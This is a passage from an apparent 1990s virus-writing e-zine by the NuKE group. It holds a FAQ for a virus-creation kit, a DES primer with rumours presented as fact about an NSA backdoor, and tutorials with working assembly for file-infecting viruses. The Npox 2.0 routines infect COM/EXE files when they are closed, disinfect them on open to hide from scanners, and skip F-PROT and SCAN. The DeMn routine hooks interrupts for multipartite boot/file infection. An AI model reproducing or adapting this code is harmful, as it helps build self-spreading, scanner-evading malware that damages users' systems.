at all. If your assembler normally works, it could be that you don't
have enough memory for the compiler (VCL shells out to run it, and it
itself uses 200k, so if you have low memory when starting VCL, your
assembler will have even less). Try removing TSRs, decreasing buffers,
etc. if this seems to be the case. Your assembler might not be truely
MASM/TASM compatible, too. Specifically, A86 will not work with VCL
without user-modification of VCL-generated code. There is also the
chance that a routine that you've added has bad assembler code, causing
your assembler to abort, spoiling the process. There's also the very
remote chance that VCL has produced bad code (when there is low memory
a stray pointer sometimes causes VCL to go haywire and churn out bad
ASM code). If none of this seems to be the case, just Make .ASM and
assemble it yourself from DOS.
Q: HELLO CAN I HELP WITH YOUR VIRUS MAKER? I NO BASIC GOOD AND I WILL
MAKE U AN ANSI 2 IF U GET ME SUM CC#S AND CODEZ AND DRIVE TO
INDIANA TO GET ME FIREWORKS!
A: Go to hell, Suicidal Maniac!
Q: I've written a virus and it seems to crash occationally or give odd
error messages. What's up?
A: Do you have Anti-Tracing functions on? If so, turn them off. I made
a small mistake in the anti-trace code which can cause system crashes
under some conditions. It worked fine for me, but on some setups strange
things can happen. If you don't have anti-tracing on, I'm afraid I can't
help you...just look over the code (if you no assembler) and look for
possible errors.
Q: Ok, I've written a trojan horse, but when I run it, it crashes. I've
compiled from DOS with...
A: Ah ha, that's enough! As I stated in the on-line help, when using
encryption on a trojan horse, you *must* compile from the VCL IDE. If
for some reason you are compiling from DOS, TURN ENCRYPTION OFF. You
see, unlike viruses, which can start off unencrypted, trojans must be
encrypted from the start, since they only go off once and are sent
direct, not in infected files. For that reason, the general technique of
having the initial encryption key be zero (used by almost all encrypted
viruses) won't work; VCL generates the encryption routine assuming the
trojan's already encrypted. When you compile from the IDE, VCL pre-
encrypts the trojan, so the encryption/decryption routine decrypts it at
runtime. But when you compile from DOS, the trojan is unencrypted, so
when it's run, the routine *encrypts* the virus, causing it to crash
(the processor's trying to run useless code).
Q: HEY D00D I WANT TO HELP U WITH YOUR VIRUS CREATOR LAB NOW! WHAT DO
I DO FOR IT NE WAY? THANX L8R!!!
A: Damn it, Suicidal Maniac, didn't you hear me the first time? FUCK OFF!
Q: When I link my virus, it says "Warning: no stack." What's wrong?
A: Absolutely nothing. The linker can give this message if it's generating
a .COM file (which all VCL executables are). It thinks there should be
a stack, but .COMs don't have built-in stacks, only .EXEs do. Be sure
to run EXE2BIN, however, as the linker output an .EXE file.
Nowhere Man and The NuKE Associates
===========================================================================
===========================================================================
Data Encryption Standard (DES)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DES algorithm is a mathematical device, not an IC chip, computer system
or other piece of hardware. Several of H/Pers have heard of the buzzword
"DES Encryption" many times and, yet, few individuals seem to know what it
really means. Therefore, on my search to find out more about the IBM 9600
modems included with the IBM 4700s, I fell upon the need-to-know on how DES
really worked, in order to learn about its fallbacks, hopefully this will
answer many questions you have, as well as generate a few.
The Computer Age brought with it computer usage in banking and the
financial institutions. Inevitably, computer crime came along with it.
There arose the problem that, with sufficient knowledge and a computer
terminal, one could transfer funds into his own account, make credit
purchases on someone else's card, or even get money from a cash-dispensing
machine.
IBM quickly realized this and in the early 1970 set up a research group to
develop a suitable cipher code to protect data. In 1971, a code named
LUCIFER was developed. It was sold to Lloyds of London for use with an
IBM-developed cash-dispensing system.
LUCIFER
~~~~~~~
Lucifer was successful but it had some weaknessess. IBM then spent about
three years refining and strengthening Lucifer. The code was analyzed over
and over by experts in cryptology. It withstood sophisticated
cryptoanalytical attacks and, by 1974, it was ready to market. Around the
same time, the National Bureau of Standards (NBS) which since 1965 was
responsible for developing standards for the purchase of computer equipment
by the Federal Government (USA) initiated a study of computer security. The
NBS saw a need for an encryption method, and solicited for a suitable
encryption algorithm. This was done in May 1973, and August 1974. The
algorithm was to be for the storage and transmission of unclassified data.
In response to this solicitation IBM submitted its Lucifer cipher. This
cipher consisted of an extremely complex algorithm embedded in an IC
structure. Basically the cipher key goes into a series of eight "S" boxes
-- complex mathematical formulas that encrypt and decrypt data with the
appropriate key. The initial Lucifer cipher had a 128-bit key. Before it
submitted the cipher to NBS, IBM shortened it by removing more than half
the key.
NSA Participation
~~~~~~~~~~~~~~~~~
The National Security Agency (NSA), however, had taken an enormous interest
in Project Lucifer. It had lent IBM a hand in the development process and
had helped to develop the S-box structures, as NSA needed to know the
structure of Lucifer just in case they needed to decrypt data encoded with
it. For years NSA had been dependent on international data communications.
It monitored data communications, such as Middle East oil transactions and
messages, and the financial and trade transactions from Latin American,
Europe, and the Far East. Also, military and diplomatic intelligence
(encrypted using crude techniques) were picked up and deciphered by NSA.
Thus, much information about Communist countries was obtained from non-
communist countries. Now, the development of an economical, highly secure,
data-encryption device threatened to cause NSA serious trouble. Also,
outside researchers might stumble across some of NSA's methods.
Meetings of NSA and IBM resulted in an agreement by IBM to reduce its key
from 128 bits to 56 bits, and to classify certain details about their
selection of the eight "S" boxes for the cipher. The National Bureau of
Standards passed this cipher to NSA for analysis. The NSA certified the
algorithm as "free" of any mathematical or statistical weaknesses and
recommended it as the best candidate for the National Data Encryption
Standard (DES). This suggestion was met with criticism. Was the cipher just
long enough to prevent corporate eavesdroppers from penetrating it, and
just short enough for NSA's code breakers?! Was there a mathematical trick
(CLASSIFIED) that would enable NSA to quickly break the code?
The NSA had been tinkering with the critical "S" boxes, and it had
therefore INSISTED that certain details were to be classified. The reason
sited for this was simple: since the DES would be commercially available
and would be sold abroad as well, NSA would be hanging itself by permitting
the foreign use of an unbreakable cipher. The weaknesses designed into the
cipher would still allow the agency to penetrate every communications
channel and data bank using DES. The code breakers at NSA wanted to be sure
the NSA could break the cipher. As a result, a bureaucratic agreement was
reached. The S-Box part of the cipher was strengthened (which is
CLASSIFIED), and the key, which was dependent on the users of the code was
weakened.
(Did NSA put a "Backdoor" into DES? The answer is normally YES! NSA had to
have the upper-hand to all code encrypted with DES. If we go back a few
months a movie was based on this topic. "Sneakers" raised several hints
that DES had a backdoor.)
Computer "rumours" (well more like FACTS) say that it would be possible to
build a computer using a million special "search chips" that could test a
million possible solutions per second, and, therefore in 72,000 seconds
(20 hours), all possible combinations could be tried. There would be a 50%
probability that just 10 hours of trial-time would break the code
(56-bits).
What if the 128-bit key, the original Lucifer, had been submitted for
consideration? Or did IBM submit the 128-bit key Lucifer but "reasoned"
with the NSA for a 56-bit key? Nevertheless a 128-bit key provides
34.03 x 10 ^ 37, or 34 followed by 37 zeros, combinations! This number
is astronomical and incomprehensible to most people. If one TRILLION
solutions per second were possible it would take a mere 34 x 10 ^ 25
seconds or about 10,800,000,000,000,000,000 YEARS! And we are only rumoured
to know about the one-million possible solutions per second, not a trillion
as used on this example! Therefore IBMs Lucifer code (at present) is
probably unbreakable.
DES Becomes Accepted
~~~~~~~~~~~~~~~~~~~~
And on June 15, 1977, the Data Encryption Standard (DES) became the
official civilian cipher of the U.S. government. It is now widely used in
banking systems and other classified institutions.
To follow are a few clips from FIPS on DES, perhaps we can learn a tab from
this code and implement a rather crude manner of it into a virus? Undoubtly
we will have all of Soloman's, McAfee's, Frisk's and other's horses and men
trying to "crack" the code, but will they succeed in doing so? There's only
one way to find out now? Right?
Excerpts from the Data Encryption Standard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From Federal Information Processing Standards (FIPS) publications 46, 74,
and 81.)
The Data Encryption Standard (DES) specifies an algorithm to be
implemented in electronic hardware devices and used for the cryptographic
protection of computer data. The publications concerning this standard
provide a complete description of mathematical algorithm for encrypting
(enciphering) and decrypting (deciphering) binary-coded information.
Encrypting data converts the data to an unintelligible form called cipher.
Decrypting a cipher converts the data back to its original form. The
algorithm described in the standard specifies both enciphering and
deciphering operations which are based on a binary number called a key. The
key consists of 64-binary digits, of which 56 bits are used directly by the
algorithm and 8 bytes are used for error
detection (checksum).
Binary-coded data may be cryptographically protected using the DES
algorithm in conjunction with a key. The key is generated in such a way
that each of the 56-bits used directly by the algorithm are random and the
8 error-detecting bits are set to make the parity of each 8-bit byte of the
key odd, ie: there is an odd number of 1s in each 8-bit byte. Each member
of a group of authorized users of encrypted computer data must have the key
that was used to encipher the data in order to use the data. This key, held
by each member in common, is used to decipher any data received in cipher
form from other members of the group. The encryption algorithm specified in
this standard is commonly known among those using the standard. The unique
key chosen for use in a particular application makes the results of
encrypting data, using the algorithm, unique. Selection of a different key
causes the cipher, which is produced for any given set of inputs, to be
different. The cryptographic security of the data depends on the security
provided for the key that is used to encipher and decipher the data.
Data can be recovered from a cipher only by using the exactly same key that
was used to encipher it. Unauthorized recipients of the cipher, who know
algorithm but do not have the correct key, cannot derive the original data
algorithmically. However, anyone who does have the key and the algorithm
can easily decipher the cipher and obtain the original data. A standard
algorithm, which is based on a secure key, thus provides a basis for
exchanging encrypted computer data, by issuing the key that is used to
encipher it only to those authorized to have the data. Additional Federal
Information Processing Standards (FIPS) guidelines for implementing and
using the DES are being developed and will be published by NBS.
"Guidelines for Implementing and Using the NBS Data Encryption Standard,"
FIPS Publication 74.
NBS describes two different modes for sing the algorithm described in this
standard. Blocks of data containing 64 bits may be directly entered into
the device where 64-bit cipher blocks are generated under control of the
key . This is called the "Electronic CodeBook" (ECB) mode. Alternating, the
device may be used as a binary stream generator to produce statistically
random binary bits, which are then combined with the clear (unencrypted)
data (1 to 64 bits) using an "Exclusive OR" (XOR) logic operation. In order
to assure that the enciphering device and the deciphering device are
synchronized their inputs are always set to the previous 64 bits of cipher
that were transmitted or received. This second mode of using the encryption
algorithm is called the "Cipher FeedBack" (CFB) mode.
The Electronic CodeBook mode generates blocks of 64 cipher bits.The Cipher
Feedback mode generates a cipher having the same number of bits as the
plain text. Each block of cipher is independent of all others when the
Electronic CodeBook mode is used, while each byte (group of bits) of cipher
depends on the previous 64 cipher bits when the Cipher FeedBack mode is
used.
The cryptographic algorithm specified in this standard transforms a 64-bit
binary value into a unique 64-bit binary value based on a 56-bit variable.
If the complete 64-bit input is used (ie: none of the input bits should be
predetermined from block to block) and if the 56-bit variable is randomly
chosen, no technique other than that of trying all the possible keys, using
a know input and output for the DES, will guarantee finding the chosen key.
As there are over 70,000,000,000,000,000 (70 quadrillion) possible keys of
56 bits, the feasibility of deriving a particular key in this way is
extremely unlikely in typical "threat" environments. Moreover, if the key
is changed frequently, the risk of this event happening is greatly
diminished. However, users should be aware that it is theoretically
possible to drive the key in fewer trials (with a correspondingly lower
probability of success depending on the number of keys tried), and should
be cautioned to changed the key as often as practical. Users must change
the key and must provide it a high level of protection in order to
minimize the potential risks of its unauthorized computation or
acquisition. The feasibility of computing the correct key may change with
advances in technology.
Data Encryption Methods
~~~~~~~~~~~~~~~~~~~~~~~
Encryption is the transformation of data from its original intelligible
form to an unintelligible cipher form. Two basic transformations may be
used: permutation and substitution. Permutations changes the order of the
individual symbols comprising the data. In a substitution transformation,
the symbols themselves are replaced by others symbols. During permutation,
the symbols retain their identities but lose their positions. During
substitution, the symbols retain their positions but lose their original
identities.
The set of rules for a particular transformation is expressed in an
algorithm. Basic transformations may be combined to form a complex
transformation. In a computer system, the symbols of the data are groups of
one or more binary digits (1s and 0s) called bits. A group of bits is
called a byte. In computer applications, the encryption transformation of
permutation reorders the bits of the data. The encryption transformation of
substitution replaces one bit with another or one byte with another.
Data Encryption Algorithm
~~~~~~~~~~~~~~~~~~~~~~~~~
The algorithm is designed to encipher and decipher blocks of data
consisting of 64-bits under control of a 64-bit key. Deciphering must be
accomplished by using the same key that was used for enciphering, but with
the schedule of addressing the key bits altered so that the deciphering
process is the reverse of the enciphering process.
A block to be enciphered is subjected to an initial permutation, IP,and
then to a compels key-dependent computation, and, finally, to a permutation
which is the inverse of the initial permutation. The key-dependant
computation can be defined simply, in terms of a functions "F" called the
cipher function, and the function `KS' called the key schedule. A
description of the computation is given first along with the details as to
how the algorithm is used for encipherment. Next the use of the algorithm
for decipherment is described. Finally, a definition of the cipher
functions "F" is given in terms of the primitive functions, and which are
called selection functions "Si" and the permutations function "P". The
primitive functions Si, P, KS of the algorithm are contained in the
Appendix of FIPS Publication 46.
The following notation is convenient: Given two blocks (L and R) of bits,
LR denotes the block consisting of the bits of L followed by the bits of R.
Since concatenation is associative B1,B2...B8, for the example, denotes the
block consisting of the bits of B1 followed by the bits of B2...followed by
the bits of B8.
Enciphering
~~~~~~~~~~~
A sketch of the enciphering computation is given below. The following
information is given more clearly and accurately in FIPS Publications 46
and 74. It is quoted here for informational purposes only.
The 64 bits of the input block to be enciphered are first subjected to the
following permutations call the initial permutations, IP:
--------- IP ----------- That is, the permuted input has bit
58 50 42 34 26 18 10 2 58 of the input as its first bit, bit
60 52 44 36 28 20 12 4 50 as its second bit, and so on, with
62 54 46 38 30 22 14 6 bit 7 as its last bit. The permuted
64 56 48 40 32 24 16 8 input to the complex key-dependent
57 49 41 33 25 17 9 1 computation described below. The
59 51 43 35 27 19 11 3 output of that computation, called the
61 53 45 37 29 21 13 5 preoutput, is then subjected to the
63 55 47 39 31 23 15 7 following permutation, IP-1, which is
------------------------ the inverse of the initial permutation
-------- IP -1 ---------
40 8 48 16 56 24 64 32 That is, the output of the algorithm
39 7 47 14 54 22 62 31 has bit 40 of the preoutput block as
38 6 46 14 54 22 62 30 its first bit, bit 8 as its second bit
37 5 45 13 53 21 61 29 and so on, until bit 25 of the
36 4 44 12 52 20 60 28 preoutput block is the last bit of the
35 3 43 11 51 19 59 27 output.
34 2 42 10 50 18 58 26
33 1 41 9 49 17 57 25
------------------------
Characteristics of the DES Algorithm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DES algorithm is a recirculating, 64-bit, block product cipher whose
security is based on a secret key. DES keys are 64- bit binary vectors
consisting of 56 independent information bits and 8 parity bits. The parity
bits are reserved for error-detection purposes and are not used by the
encryption algorithm. The 56 information bits are used by the enciphering
and deciphering operations and are referred to as the active key. Active
keys are generated (selected at random from all possible keys) by each
group of authorized users of a particular computer system or set of data.
Each user should understand that the key must be protected and that any
compromise of the key will compromise all data and resources protected by
that key. In the encryption computation, the 64-bit data input is divided
into two halves, with each consisting of 32 bits. One half is used as input
to a compels nonlinear function, and the result is Exclusive-OR'ed to the
other half. After one iteration, or round, the two halves of the data are
swapped and the operation is performed again. The DES algorithm uses 16
rounds to produce a recirculating block product cipher. The cipher produced
by the algorithm displays no correlation to the input. Every bit of the
output depends on every bit of the input and on every bit of the active
key. The security provided by the DES algorithm is based on the fact that,
if the key is unknown, an unauthorized recipient of encrypted data, knowing
some of the matching input data, must perform an unacceptable effort to
decipher other encrypted data or recover the key. Even having all but one
bit of the key correct does not result in intelligible data.
The only known way of obtaining the key with certainty is by obtaining
matching ciphertext and plaintext and, then, exhaustively testing the keys
by enciphering the known plaintext with each key and comparing the result
with the known ciphertext. Since 56 independent bits are used in a DES key,
2^56 such tests are required to guarantee finding a particular key. The
expected number of tests needed to recover the correct key is 2^55. At one
microsecond per test, 1142 years would be required. Under certain
conditions (not only knowing matched plaintext and ciphertext but also the
complement of the plaintext and the resulting ciphertext), the expected
effort could be reduced to 571 years. The possibility of 70 quadrillion
keys makes the guessing or computing of any particular key very unlikely,
given that the guidelines for generating and protecting a key provided in
the publication are followed. Of course, on can always reduce the time
required to exhaust any crytoalgorithm by having several devices working in
parallel; time is reduced but initial expenses are increased.
Rock Steady/NuKE
===========================================================================
===========================================================================
*************************************
** Disinfecting an Infected File **
** **
** By Rock Steady/NuKE **
*************************************
The BEST advantage a virus can have is `Disinfecting of Fly' as we must
try to basically hide the virus as well as possible! And nowadays Anti-
Virus programs are going crazy. As I remember at the time Npox 2.0 was
developed it would Disinfect every file opened by F-prot and Scan and
when the Scanner found nothing and closed the file to go on to the next
Npox would re-infect them. Truly can cause havoc, As a matter of fact
Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he
added his own routine to open files by Int21h/6C00h, as Npox only
disinfected on Int21h/3Dh, however to make the virus disinfect on
Int21h/6C00h, doesn't require much work, simply to take the ASCIIZ
string at DS:SI and put SI into DX so we have DS:DX pointing to it,
then run this routine.
The Basic idea on disinfection is this...
-For .COM files
Restore the first 3 bytes original Bytes of the program, these
3 bytes are usually somewhere inside the virus, and then simply
remove the virus from the end of the .COM file!
We do this by jumping to the end of the COM file and subtracting
the Virus size from the File size and that new value is the
original file size!
NOTE: if you write a virus that its length changes (Polymorphic)
its wise to save the original Filesize to be infected before
hand.
-For .EXE files & Overlays
This procedure is not different, just that if you changed CS:IP &
SP:SS in the EXE header, simply restore the original values, or to
save time, simple save the Original EXE header (first 1b bytes) in
the virus and right that to the beginning as I did for Npox 2.0
Then Subtract yourself from the original size and cut it off!
I will now follow thru the Npox 2.0 virus routine Closely so you can under
stand this process.
Okay first thing you would want to do is CHECK if this is a valid file!
If the virus infects COMs & EXEs, do not waste your time looking thru
other extensions, or for tight code you can waste your time and "HOPE"
the `infection' marker will fail! Meaning if the virus uses the seconds
field set to 60 (as Npox) then naturally only INFECTED files will have
a time stamp of 60! And this routine is not needed...
opening_file: call check_extension ;Check for .COM extension
jnc open_fuck2 ;YES; Jmp & Disinfect
call check_exten_exe ;Check for .EXE extension
jnc open_fuck2 ;YES; Jmp & disinfect
jmp dword ptr cs:[int21] ;Other wise goto DOS
; At this point the file has an .COM or .EXE extension, so we continue
open_fuck2: push ax ;Save AX
mov ax,3d02h ;Ready to open
call calldos21 ;Do it!
;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h"
;command, as the virus will intercept it, and will come to this routine
;and it will continue over and over again, Never ending loop, until the
;stack gets too big, overwrite the code and the system jams...All done
;in about 2 seconds...
jnc open_fuck1 ;No Error Continue
pop ax ;restore
iret ;Exit
open_fuck1: push bx
push cx
push dx
push ds
mov bx,ax ;BX=File handler
mov ax,5700h ;Get file TimeStamp
call calldos21
mov al,cl ;move seconds into al
or cl,1fh ;Left just seconds
dec cx ;60 Seconds
xor al,cl ;cmp
jnz opening_exit3 ;NOT 60 seconds exit!
dec cx
mov word ptr cs:[old_time],cx ;Save time Stamp
mov word ptr cs:[old_date],dx ;Save Date Stamp
mov ax,4202h ;Goto the End of File
xor cx,cx
xor dx,dx
call calldos21
mov cx,dx ;Save the filesize
mov dx,ax ;we will need it later
;to subtract the virus
push cx ;size fromit...
push dx ;Save it...
Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header)
in the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at
the VERY END! Since the buffer I made was 1B hex bytes, it is able to
hold the EXE header or 3 .com bytes, anyhow the beginning of these
bytes are the last 1B bytes, since its at the end... figure it out where
you saved your 3 bytes or exe header for your virus, or use the Npox
routine...
sub dx,1Bh ;Subtract 1B bytes from
sbb cx,0 ;the filesize!
mov ax,4200h ;Now our pointer will
call calldos21 ;point to the 1B bytes
;Where the COM & EXE
;original bytes are
push cs
pop ds ;CS=DS (for exes)
mov ah,3fh ;Read them into Buffer
mov cx,1Bh ;1B bytes
mov dx,offset buffer ;to our buffer
call calldos21
humm, now we got the original bytes, all we gotta do is write them
back to the file's beginning...
xor cx,cx ;Goto Beginning of File
xor dx,dx ;
mov ax,4200h
call calldos21
mov ah,40h ;Write first three bytes
mov dx,offset buffer ;our buffer
mov cx,1Bh ;1B bytes for EXEs
cmp word ptr cs:[buffer],5A4Dh
je open_exe_jmp ;if EXE file jump
mov cx,3h ;if COM write only 3 bytes
open_exe_jmp: call calldos21
We wrote the original file's data back to place, now we need to cut the
virus off from the file, the virus is written at the end of the file,
so all we do is set our file-pointer to EOF - Virus_Size, which gives
us the original file length!
pop dx ;EOF - Virus_Size
pop cx ;to get ORIGINAL File size
sub dx,virus_size ;subtract virus size
sbb cx,0
mov ax,4200h
call calldos21
Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file, at
our new ptr location, what we do it use does to crop it, by writing 0
bytes to the new location, DOS will make that new location the NEW
EoF and in result cutting off the virus and deleting its sector in the
fat.
mov ah,40h ;Write new EOF
xor cx,cx ;Zero Bytes
call calldos21 ;doit
mov cx,word ptr cs:[old_time] ;Restore file time
mov dx,word ptr cs:[old_date] ;Restore file date
mov ax,5701h
int 21h
mov ah,3eh ;Close File
call calldos21
opening_exit3: pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21] ;Return to DOS...
ahh, the file is now Disinfected, now we safely return it to DOS and DOS
may now open the file for inspection...
Rock Steady/NuKE
===========================================================================
===========================================================================
****************************
** Infection on Closing **
** **
** By Rock Steady/NuKE **
****************************
This routine goes out for a few people that had trouble hacking this
routine themselves... I kinda like it, its my very OWN, no Dark Avenger
hack, it is VERY straight forward, and kinda simple...I was not going
to put this here, but since I `Promised' people and left them hanging
with `Wait for IJ#5, I guess I owed you it... huh?'
Again this code comes right out of Npox 2.0, its need, simple fast,
cool, and it works, Npox is your example, I heard MANY MANY complaints
with other `Virus writing guides' Meaning they explained the code but
sometimes the arthur himself never check if the code was good, as he
may have modified it, and not test it... or whatever reason... Anyhow
------------------
Okay once you intercepted the Int21h/ah=3Dh function you make it jump
here...
closing_file: cmp bx,0h ;Handle=0?
je closing_bye ;if equal leave
cmp bx,4h ;Handle > 4
ja close_cont ;if YES ,then JUMP!
closing_bye: jmp dword ptr cs:[int21] ;Leave, no interest to us
The whole point of the above code is that DOS contains 5 predefined
Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX
COMx, LPTx handles... So we surely do not need to continue once we
encounter that...
close_cont: push ax
push bx
push cx
push dx
push di
push ds
push es
push bp
Our biggest problem is how do we know if this file is a .COM or .EXE or
simply just another dumb data file? We need this info before we can
try to infect it... We do this by getting DOS's "Lists of List" this
will give us all INFO need on the File Handle Number we have in BX!
and we do that like so...
push bx ;Save File Handle
mov ax,1220h ;Get the Job File Table
int 2fh ;(JFT)
This will give us the JFT for the CURRENT File handle in BX, which
is given thru ES:DI Then we use this information to get the Address of
the System File Table!
mov ax,1216h ;Get System File Table (List)
mov bl,es:[di] ;system file table entry number
int 2fh
pop bx ;restore the Handle
add di,0011h
mov byte ptr es:[di-0fh],02h
add di,0017h ;Jump to the ASCIIZ string
cmp word ptr es:[di],'OC' ;Is it a .COM file?
jne closing_next_try ;Next cmp...
cmp byte ptr es:[di+2h],'M'
jne pre_exit ;Nope exit
jmp closing_cunt3 ;.COM file continue
closing_next_try:
cmp word ptr es:[di],'XE' ;Is it a .EXE file?
jne pre_exit ;No, exit
cmp byte ptr es:[di+2h],'E'
jne pre_exit ;No, exit
If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when
started up, Opens itself, closes itself, etc... So that a dumb
virus will infect it, and then the CRC value changes and F-PROT
screams... haha... Fuck-Prot! is the name...
closing_cunt: cmp word ptr es:[di-8],'CS'
jnz closing_cunt1 ;SCAN
cmp word ptr es:[di-6],'NA'
jz pre_exit
closing_cunt1: cmp word ptr es:[di-8],'-F'
jnz closing_cunt2 ;F-PROT
cmp word ptr es:[di-6],'RP'
jz pre_exit
closing_cunt2: cmp word ptr es:[di-8],'LC'
jnz closing_cunt3
cmp word ptr es:[di-6],'AE' ;CLEAN
jnz closing_cunt3
pre_exit: jmp closing_nogood
The REST is pretty much the EXACT same on `how' you'd infect a normal
file, I'll leave it for you to go thru it... The hardest part is
OVER! Only trick part is, the ending... Remember to Close the file
and then do an IRET, you don't leave control to dos, as you only needed
to close it, so do it... OR DON'T close it and return to DOS, as dos
will close it, just DON'T CLOSE IT TWICE!!!!
closing_cunt3: mov ax,5700h ;Get file Time
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jz closing_nogood ;Already infected
push cs
pop ds
mov word ptr ds:[old_time],cx ;Save time
mov word ptr ds:[old_date],dx
mov ax,4200h ;jmp beginning of
xor cx,cx ;file...
xor dx,dx
call calldos21
mov ah,3fh ;Get first 1b byte
mov cx,1Bh
mov dx,offset buffer
call calldos21
jc closing_no_good ;error?
mov ax,4202h ;Jmp to the EOF
xor cx,cx
xor dx,dx
call calldos21
jc closing_no_good
cmp word ptr ds:[buffer],5A4Dh ;.EXE file?
je closing_exe ;Yupe then jmp
mov cx,ax
sub cx,3h
mov word ptr ds:[jump_address+1],cx ;Figure out the
call infect_me ;jmp for .com
jc closing_no_good
mov ah,40h ;Write it to file
mov dx,offset jump_address
mov cx,3h
call calldos21
closing_no_good:
mov cx,word ptr ds:[old_time] ;Save file time
mov dx,word ptr ds:[old_date] ;& date
mov ax,5701h
call calldos21
closing_nogood: pop bp
pop es
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
AS you see the above, we DIDN'T close the file, so we leave dos to do it.
The bottom is for infecting .exes...
closing_exe: mov cx,word ptr cs:[buffer+20] ;Save the original
mov word ptr cs:[exe_ip],cx ;CS:IP & SS:SP
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc closing_no_good
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz close_split
inc dx
close_split: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
closing_over: jmp closing_no_good
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Infection Routine...
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
infect_me proc
mov ah,40h
mov dx,offset init_virus
mov cx,virus_size
call calldos21
jc exit_error ;Error Split
mov ax,4200h
xor cx,cx ;Pointer back to
xor dx,dx ;Top of file!
call calldos21
jc exit_error ;Split Dude...
clc ;Clear carry flag
ret
exit_error:
stc ;Set carry flag
ret
infect_me endp
===========================================================================
===========================================================================
Multipartite Infection
~~~~~~~~~~~~~~~~~~~~~~
OK, you've seen them floating around... these whiz-bang you-bewt mongrel
viruses which never seem to go away, even after you disinfect every file
in existence... Huh... How the fuck did that come back?! Well it's really
quite simple, and I'm sure not all of you out there are complete idiots.
The fact is that the virus isn't even in any files! ...It's hiding in
the partition table, or the boot sector!
There are only a few viruses out there with the capability for
multipartite infection, or "boot/file virus". Tequila, Anthrax and
Invader are a few examples. My own creation, DeMn, is another, going
a step further than any other boot/file virus has ever gone before, by
infecting almost everything possible.
The principle is VERY simple, in fact I kicked myself when I worked out
a way to do it. The idea is simple, and it's the very same principle
employed in any other TSR method... to hook interrupt 21h (DOS). This is
fine. BUT the only hitch is that DOS automatically overwrites the old
vector when it loads! So there's no point hooking it as soon as your
code loads up off the disk. So what can we do?
We will obviously have to wait for DOS to change the interrupt, so we
can hook it. But there's one problem! Other stupid programmers were
being selfish and change the i21 pointer as a marker so that they can
tell if it's been changed... like Invader puts in a -1 in the IP value of
int 21h... so if something like DaeMaen is also on the sytem, it thinks
it's DOS changing the pointer, hooks it and crashes the entire system...
The way I waited for the pointer to change was to hook interrupt 13
TWICE! (huh?) Pretty simple. What I did was have my int-check routine
hooked onto i13 first, then my i13 handler over the top. The reason why
you can't have it the other way is that in case another "program" hooks
i13 over the top, and you can't disable your int-check routine... so
it'll keep re-hooking and fuck up the system. (You could do it with
flags, but I try and use as few flags as possible to keep code size down
to a minimum).
At boot-up, the program checks to see if it's already TSR (via an
illegal call to some interrupt, and checking the return code) and if it
isn't, it steals some memory (something F-Prot and friends can pick up,
but who gives a fuck, plus I can get around that now...<hehe>), hooks
int 13h with the int-check routine, hooks it again with our i13 handler,
then save the current interrupt 21h vector. On every disk call, it
compares the value of i21 with the saved value... if it's different, the
int-check routine hooks it and then change the vector that our int 13h
handler calls, so it no longer calls our int-check routine but goes
straight to the real i13.
That's the essentials of boot/file management. Anyhow, here's the code
to do what I just said, as it appears in the source code of DeMn...
new13_2: ; the guts of multipartite infection
; check to see if i21 has changed... if so, hook it
call save ; save registers
push cs
pop es
xor ax, ax
mov ds, ax
mov si, 21h*4
mov di, offset oldvect+8
cld
cmpsw
je nochange
cmpsw
je nochange
call capture_21
push cs
pop ds
mov si, offset oldvect+0 ; copy over other ptr so
lea di, [si+4] ; that our i13 doesn't call
movsw ; here any more [i21 has
movsw ; been hooked]
nochange: call restore ; restore registers
jmp dword ptr cs:[oldvect+0]
This method can be used on either floppy boot sector infection or the HD
partition table infection.
As with many of my routines, stuff which took many other virus writers a
few pages of code took me one page... that's not bad! I have many other
goodies up my sleeve, like a 387-byte generic COM/EXE parasitic infector
on execution, the smallest of its kind in the WORLD... (with room for
improvement!).
Anyway, next InfoJournal will include the source codes to two of my
prerelease Mutation Engines, both of which are fully functional in their
own right. They have evolved far beyond my dreams, and I hope to have
the world's best mutation engine finished by the end of February/March.
(but it can't be the best at everything, but it sure generates a bucket
fuckload of arcane bullshit instructions. Heuristical nightmare...)
Anyway, have fun screwing around with this little piece of research
material...
TLN/NuKE
===========================================================================
===========================================================================
DeMn Virus
~~~~~~~~~~~~~
This virus took me a while to write (about two weeks), because I was
writing a lot of it for the first time. Some of the code is a bit
overboard, like I don't think the SYS entry has to be quite that complex
in order to work... but never mind. At least it works and it's quite
well-behaved.
This virus is my first boot/file virus, and that also works perfectly.
I worked all my own routines from scratch (my virus collection is
